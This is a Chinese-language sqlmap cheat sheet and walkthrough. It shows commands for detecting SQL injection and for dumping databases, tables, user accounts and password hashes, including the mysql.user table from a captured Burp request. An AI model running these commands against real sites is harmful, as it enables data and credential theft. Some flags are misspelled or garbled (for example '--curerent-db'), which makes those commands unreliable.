一、命令
1、判断是否存在注入
sqlmap.py -u url
(如果注入点后面的参数大于等于两个,需要加双引号)
2、判断文本中的请求是否存在注入
Sqlmap.py -r desktop/1.txt
一般在存在cookies注入的情况下使用
3、查询当前用户下的所有数据库
sqlmap.py -u url --dbs
确定网站存在注入后,用于查询当前用户下的所有数据库。如果当前用户有权限读取包含所有数据库列表信息的表,使用该命令就可以列出所有相关数据库。
4、获取数据库中的表名
sqlmap.py -u “url” -D dkeye(具体数据库) --tables
如果不加入-D来指定某一个数据库,那么会列出数据库中的所有的表。继续注入时缩写成—T,在某表中继续查询
5、获取表中的字段名
sqlmap.py -u “url” -D dkeye -T user_info(具体表名) --columns
查询完表名后,查询该表中的字段名,在后续的注入中,—columns缩写成-C
6、获取字段内容
sqlmap.py -u “url” -D dkeye -T user_info(具体表名) -C usrname password(具体字段) --dump
7、获取数据库所有用户
sqlmap.py -u url --users
列出数据库所有用户,如果当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有管理用户。
8、获取数据库用户的密码
sqlmap.py -u url --passwords
如果当前用户有读取包含用户密码的权限,sqlmap会先例举出用户,然后列出hash,并尝试破解。
9、获取当前网站数据库的名称
sqlmap.py -u url --curerent-db
使用该命令可以列出当前网站使用的数据库
10、获取当前网站数据库的用户名称
sqlmap.py -u url --current-user
使用该命令可以列出当前网站使用的数据库用户
二、具体过程:
1.用brup进行抓包
2.将包复制到kali里面
3.判断文本中的请求是否存在注入
sqlmap -r
4.完成后会有提示存在哪些SQL注入
5.查询当前用户下的所有数据库
sqlmap -r '/home/kali/Desktop/111.txt' --dbs
6.查表名
sqlmap -r '/home/kali/Desktop/111.txt' -D mysql --tables
7.查字段名
sqlmap -r '/home/kali/Desktop/111.txt' -D mysql -T user --columns
8.获取字段内容
sqlmap -r '/home/kali/Desktop/111.txt' -D mysql -T user -C Host --dump